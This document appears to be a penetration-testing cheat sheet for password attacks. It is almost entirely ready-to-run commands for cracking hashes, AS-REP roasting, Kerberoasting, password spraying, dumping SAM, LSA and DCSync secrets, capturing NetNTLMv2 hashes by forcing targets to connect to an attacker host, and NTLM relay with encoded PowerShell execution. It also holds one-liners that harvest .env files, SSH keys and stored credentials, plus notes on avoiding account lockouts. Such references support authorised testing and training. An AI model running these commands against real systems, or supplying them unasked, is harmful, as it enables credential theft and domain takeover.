Password Attacks Cheat Sheet
#HASH IDENTIFICATION
# hash-identifier (interactive)
hash-identifier
# hashid
hashid '$6$...'
hashid -m '$6$rounds=5000$...' # show hashcat mode
# hashcat auto-detect
hashcat --identify hash.txt
# Manual indicators
# $1$ = MD5 crypt (hashcat 500)
# $2a$ = bcrypt (hashcat 3200)
# $2b$ = bcrypt (hashcat 3200)
# $2y$ = bcrypt (hashcat 3200)
# $5$ = SHA-256 crypt (hashcat 7400)
# $6$ = SHA-512 crypt (hashcat 1800)
# 32 hex chars = MD5 (0), NTLM (1000)
# 40 hex chars = SHA1 (100)
# 64 hex chars = SHA-256 (1400)
# 128 hex chars = SHA-512 (1700)
# $krb5asrep$ = AS-REP (18200)
# $krb5tgs$23$ = Kerberoast TGS (13100)
# $krb5tgs$17$ = Kerberoast AES128 (19600)
# $krb5tgs$18$ = Kerberoast AES256 (19700)
# $netntlmv2$ = NetNTLMv2 (5600)
# $ntlm$ = NTLM (1000)
BASH
#HASHCAT MODE TABLE (EXPANDED)
Mode Hash Type
0 MD5
10 md5($pass.$salt)
20 md5($salt.$pass)
100 SHA1
150 HMAC-SHA1 (key = $pass)
200 MySQL323
300 MySQL4.1/MySQL5
500 md5crypt, MD5 (Unix), Cisco-IOS $1$
1000 NTLM
1100 Domain Cached Credentials (DCC), MS Cache
1400 SHA2-256
1700 SHA2-512
1800 sha512crypt $6$, SHA512 (Unix)
2100 Domain Cached Credentials 2 (DCC2), MS Cache 2
2500 WPA-EAPOL-PBKDF2
3000 LM
3200 bcrypt $2*$, Blowfish (Unix)
3710 md5($salt.$username.$pass)
4000 WordPress md5(phpass)
4010 osx sha512 ($6$)
5400 IKE-PSK SHA1
5500 NetNTLMv1 / NetNTLMv1+ESS
5600 NetNTLMv2
5800 Samsung Android Password/PIN
7300 IPMI2 RAKP HMAC-SHA1
7400 sha256crypt $5$, SHA256 (Unix)
7500 Kerberos 5, etype 23, AS-REQ Pre-Auth
7700 SAP CODVN B (BCODE)
7800 SAP CODVN F/G (PASSCODE)
8200 1Password, AgileBits PBKDF2-HMAC-SHA1 + AES
8400 WBB3 (Woltlab Burning Board)
8800 Android FDE (Samsung DEK)
8900 scrypt
9200 Cisco $8$
9300 Cisco $9$
9600 MS Office 2013
9700 MS Office <= 2003 $0/$1, MD5 + RC4
9800 MS Office <= 2003 $3/$4, SHA1 + RC4
10000 Django (PBKDF2-SHA256)
10300 SAP CODVN H (PWDSALTEDHASH) iSSHA-1
10400 PDF 1.1 - 1.3 (Acrobat 2 - 4)
10500 PDF 1.4 - 1.6 (Acrobat 5 - 8)
10600 PDF 1.7 Level 3 (Acrobat 9)
10800 SHA2-384
10900 PBKDF2-HMAC-SHA256
11400 SIP digest authentication (MD5)
11600 7-Zip
11700 GOST R 34.11-2012 (Streebog) 256-bit
12000 PBKDF2-HMAC-SHA1
12500 RAR3-hp
12600 ColdFusion 10+
13000 RAR5
13100 Kerberos 5, etype 23, TGS-REP (kerberoasting)
13400 KeePass 1 (AES/Twofish) and KeePass 2 (AES)
13500 PeopleSoft PS_TOKEN
13600 WinZip
13711 VeraCrypt SHA256 XTS 512
16000 Tripcode
16100 TACACS+
16700 FileVault 2
16800 WPA-PMKID-PBKDF2
16801 WPA-PMKID-PMK
16900 RFC 5961 SCRAM SHA-1
17200 PKZIP (Compressed)
17500 Keccak-512
18000 Django pbkdf2-sha256 (new)
18100 TOTP (HMAC-SHA1, RFC 6238)
18200 Kerberos 5, etype 23, AS-REP (AS-REP roasting)
18300 Apple File System (APFS) Encrypted User
18400 Open Document Format (ODF) 1.2
18600 Open Document Format (ODF) 1.1
18900 Android Backup (PBKDF2-HMAC-SHA1+AES)
19000 QNX /etc/shadow (sha512)
19600 Kerberos 5, etype 17, TGS-REP (Kerberoasting AES128-CTS)
19700 Kerberos 5, etype 18, TGS-REP (Kerberoasting AES256-CTS)
20000 Python Werkzeug PBKDF2-HMAC-SHA256
20600 Oracle Transportation Management SHA-256
21000 BitShares v0.x - sha512(sha512_bin(pass))
21400 sha256(sha256_bin(pass))
22000 WPA-PBKDF2-PMKID+EAPOL
22001 WPA-PMK-PMK
22100 BitLocker
22200 Citrix NetScaler (SHA1)
22500 MultiBit Classic .key (MD5)
22700 MultiBit HD (scrypt)
TEXT
#JOHN FORMAT MATCHING
# List all formats
john --list=formats
# Common pentest formats
--format=NT # NTLM hash
--format=LM # LM hash
--format=Raw-MD5 # MD5
--format=Raw-SHA1 # SHA1
--format=Raw-SHA256 # SHA-256
--format=Raw-SHA512 # SHA-512
--format=krb5tgs # Kerberos TGS (kerberoasting)
--format=krb5asrep # Kerberos AS-REP (asreproast)
--format=netntlmv2 # NetNTLMv2
--format=netntlm # NetNTLMv1
--format=bcrypt # bcrypt ($2*$)
--format=sha512crypt # Unix SHA-512 ($6$)
--format=sha256crypt # Unix SHA-256 ($5$)
--format=md5crypt # Unix MD5 ($1$)
--format=descrypt # Unix DES (legacy)
--format=mysqlna # MySQL authentication
--format=zip # PKZIP
--format=rar # RAR
--format=7z # 7-Zip
--format=keepass # KeePass
--format=office # MS Office
--format=pdf # PDF
--format=wpa # WPA handshake
# John cracking examples
john --wordlist=rockyou.txt hash.txt --format=NT
john --wordlist=rockyou.txt --rules=best64 hash.txt
john --incremental hash.txt --format=Raw-MD5 # brute force
john --show hash.txt # show cracked
BASH
#WORDLIST LOCATIONS (KALI)
# Primary wordlists
/usr/share/wordlists/rockyou.txt.gz # classic (gunzip first)
/usr/share/wordlists/dirb/big.txt # directory brute
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# SecLists (install: apt install seclists)
/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
# Other useful lists
/usr/share/dirb/wordlists/common.txt
/opt/SecLists/Passwords/ (if cloned to /opt)
/usr/share/wordlists/fasttrack.txt
BASH
#HASHCAT RULE SETS
# Built-in rules (Kali)
/usr/share/hashcat/rules/best64.rule # Fast, efficient
/usr/share/hashcat/rules/dive.rule # Aggressive, many variants
/usr/share/hashcat/rules/generated2.rule
/usr/share/hashcat/rules/Incisive-leetspeak.rule
/usr/share/hashcat/rules/T0XlC.rule
# Third-party rules (download separately)
# OneRuleToRuleThemAll.rule - comprehensive, high hit rate
# hob064.rule - good companion
# pantagrule.rule - for large wordlists
# Apply rules
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r best64.rule
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r best64.rule -r dive.rule # stacked
hashcat -m 18200 asrep.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Rule stats
hashcat --stdout rockyou.txt -r best64.rule | wc -l # how many candidates generated
BASH
#HASHCAT MASK ATTACK (-a 3)
# Mask syntax
# ?l = lowercase ?u = uppercase ?d = digit
# ?s = special ?a = all ?b = 0x00-0xff
# Common masks
hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?l?l?l?l # 8 lowercase
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?l # Capital + 7 low
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d?d # Company2024!
hashcat -m 1000 hashes.txt -a 3 -1 ?l?d ?u?1?1?1?1?1?1?1 # custom charset
hashcat -m 1000 hashes.txt -a 3 -1 ?l?d?s Company?1?1?1?1?1 # Company followed by 5 mixed
hashcat -m 1000 hashes.txt -a 3 Summer?d?d?d?d # Summer2024
hashcat -m 1000 hashes.txt -a 3 -1 ?d?l?u ?1?1?1?1?1?1?1?1 # 8 mixed alphanumeric
# Increment mode (try lengths 1-8)
hashcat -m 1000 hashes.txt -a 3 --increment --increment-min 1 --increment-max 8 ?l?l?l?l?l?l?l?l
# Hybrid: wordlist + mask
hashcat -m 1000 hashes.txt -a 6 rockyou.txt ?d?d?d # word + 3 digits
hashcat -m 1000 hashes.txt -a 7 ?d?d rockyou.txt # 2 digits + word
# Optimize for GPU
hashcat -m 1000 hashes.txt -O -a 3 ?a?a?a?a?a?a?a?a # -O optimized kernel
hashcat -m 1000 hashes.txt -a 3 -w 4 ?a?a?a?a?a?a?a?a # -w 4 max power
# Hashcat benchmark
hashcat -b
hashcat -b -m 1000
BASH
#AS-REP ROASTING
# GetNPUsers (Impacket) - with user list
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5 -request -outputfile asrep.txt
# GetNPUsers - single user with known UPN
impacket-GetNPUsers domain.local/user -no-pass -dc-ip 10.10.10.5 -request
# GetNPUsers - format hashcat (default is john)
# Edit /usr/lib/python3/dist-packages/impacket/examples/GetNPUsers.py or use -format hashcat
# Or convert: john asrep.txt --format=krb5asrep --show 2>/dev/null | cut -d: -f2-
# Netexec LDAP
netexec ldap 10.10.10.5 -u users.txt -p '' --asreproast asrep.txt
# Crack AS-REP (hashcat mode 18200)
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -r best64.rule --force
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -O -w 4
# Crack AS-REP (John)
john --wordlist=rockyou.txt --format=krb5asrep asrep.txt
BASH
#KERBEROASTING
# GetUserSPNs (Impacket)
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request -outputfile kerberoast.txt
impacket-GetUserSPNs domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5 -request
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request -outputfile kerberoast.hashcat
# Netexec
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Crack TGS (hashcat mode 13100 for RC4, 19600 for AES128, 19700 for AES256)
hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt -r best64.rule -O -w 4
hashcat -m 19700 -a 0 kerberoast_aes.txt rockyou.txt -r best64.rule
# Crack TGS (John)
john --wordlist=rockyou.txt --format=krb5tgs kerberoast.txt
BASH
#PASSWORD SPRAYING
# Netexec SMB spray (one password, many users)
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --local-auth
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --no-bruteforce
netexec smb dc.domain.local -u users.txt -p 'Summer2024!'
# Netexec SMB spray (one user, many passwords - reverse spray)
netexec smb 10.10.10.5 -u admin -p passwords.txt
# Netexec LDAP spray (less noisy, no lockout visibility)
netexec ldap 10.10.10.5 -u users.txt -p 'Password1'
# Netexec WinRM spray
netexec winrm 10.10.10.0/24 -u users.txt -p 'Password1'
# Spraying toolkit (Kerberos-based, avoids lockout)
python3 /opt/SprayingToolkit/atomizer.py users.txt domain.local 'Summer2024!'
# Password generation for spray (time-based)
# Month + Year: April2024!, July2024!, August2024!
# Season + Year: Spring2024!, Summer2024!, Winter2024!
# Company + digits: Company123, Company2024
# Create targeted wordlist from company info
hashcat --stdout -a 3 'Company?d?d?d' > company_passwords.txt
hashcat --stdout -a 6 rockyou.txt '?d?d?d?d' | head -n 10000 > common4digit.txt
BASH
#NTLM HASH EXTRACTION
# Dump SAM + SYSTEM locally (requires admin)
reg.exe save hklm\sam C:\temp\sam.hive
reg.exe save hklm\system C:\temp\system.hive
reg.exe save hklm\security C:\temp\security.hive
# Transfer to attacker, then:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL
# Remote dump (requires admin creds)
impacket-secretsdump domain.local/admin:pass@10.10.10.5
impacket-secretsdump domain.local/admin@10.10.10.5 -hashes :NTHASH
# Netexec SAM dump
netexec smb 10.10.10.5 -u admin -p pass --sam
netexec smb 10.10.10.5 -u admin -p pass --lsa
netexec smb 10.10.10.5 -u admin -p pass -M lsassy
# DCSync
impacket-secretsdump -just-dc-user administrator domain.local/user:pass@DC
impacket-secretsdump domain.local/admin:pass@DC -just-dc
# Mimikatz: lsadump::dcsync /user:krbtgt /domain:domain.local
# Crack NTLM
hashcat -m 1000 ntlm_hashes.txt rockyou.txt -r best64.rule -O -w 4
# Format: username:USERID:LM:NTLM:::
# LM blank = aad3b435b51404eeaad3b435b51404ee
BASH
#NETNTLMv2 CAPTURE AND CRACKING
# Start SMB capture (attacker)
sudo responder -I tun0 -dwv
sudo responder -I tun0 -wdP # HTTP+SMB proxy auth
# Impacket smbrelayx (captures NTLMv2)
impacket-smbserver share . -smb2support
# Trigger on target (force SMB connection to attacker)
dir \\10.10.14.5\share
start \\10.10.14.5\share
# Or via: petitpotam, printerbug, coercion tools
# Extract hash from Responder logs
# Responder stores in: /usr/share/responder/logs/
# Format: user::domain:HASHSTRING
# Crack NetNTLMv2 (hashcat mode 5600)
hashcat -m 5600 netntlmv2.txt rockyou.txt -r best64.rule -O -w 4
hashcat -m 5600 netntlmv2.txt rockyou.txt -r dive.rule --force
# Crack NetNTLMv1 (hashcat mode 5500)
hashcat -m 5500 netntlmv1.txt rockyou.txt -r best64.rule
# Crack with John
john --wordlist=rockyou.txt --format=netntlmv2 netntlmv2.txt
# NTLM relay (instead of cracking)
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc BASE64"
impacket-ntlmrelayx -tf targets.txt -smb2support -i # interactive shell
BASH
#CREDENTIAL HARVESTING - ONE-LINERS
# Linux: grep for passwords in common locations
grep -rn "password\|passwd\|pass\b\|pwd" /var/www 2>/dev/null
grep -rn "DB_PASS\|DB_USER\|DATABASE_URL\|CONNECTION_STRING" /var/www 2>/dev/null
grep -rn "API_KEY\|SECRET\|TOKEN\|JWT_SECRET" /var/www 2>/dev/null
grep -rn "^\$pw\|password\s*=" /etc /opt 2>/dev/null
cat ~/.bash_history ~/.zsh_history 2>/dev/null | grep -i "pass\|curl\|wget\|ssh\|mysql"
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
# Linux: config file enum
find / -name "wp-config.php" 2>/dev/null | xargs cat
find / -name ".env" 2>/dev/null | xargs cat
find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
# Windows: find stored credentials
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
dir /s /b C:\*pass*.txt C:\*cred*.txt C:\*.config C:\*.ini 2>nul
findstr /s /i "password" C:\*.xml C:\*.ini C:\*.txt C:\*.cfg 2>nul
# Windows: PowerShell cred scan
Get-ChildItem C:\ -Recurse -Force -ErrorAction SilentlyContinue | Select-String "password=" | Select -Unique Path
findstr /s /i /c:"ConnectionString" C:\*.config
findstr /s /i /c:"password" C:\inetpub\wwwroot\*.php 2>nul
BASH
#HASHCAT POT FILE MANAGEMENT
# hashcat pot file management
hashcat -m 1000 hashes.txt rockyou.txt --show # Show already cracked passwords
hashcat -m 1000 hashes.txt rockyou.txt -o cracked.txt # Output cracked to file
hashcat -m 1000 hashes.txt rockyou.txt --force # Force overwrite pot file
BASH
#CUSTOM WORDLIST GENERATION
# Cewl -- Custom wordlist generation from target website
cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
# -d 2: depth 2, -m 5: minimum word length 5
# username-anarchy -- Generate username patterns
username-anarchy -f first.last -i firstnames.txt -i lastnames.txt
# Common formats: first.last, flast, firstl, first_last, first.last@domain
BASH
#NTLM RELAY ATTACKS (ADVANCED)
# NTLM relay attacks (beyond just capture)
impacket-ntlmrelayx -tf targets.txt -smb2support -adcs # ADCS certificate enrollment
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01 --delegate-access # RBCD
BASH
#OPSEC NOTES
# OPSEC: Password spraying generates Event ID 4625 (failed logon) -- can trigger account lockouts
# Use --delay between attempts to avoid lockout: nxc smb <target> -u users.txt -p pass --delay 3000
# --continue-on-success may lock accounts -- use carefully
TEXT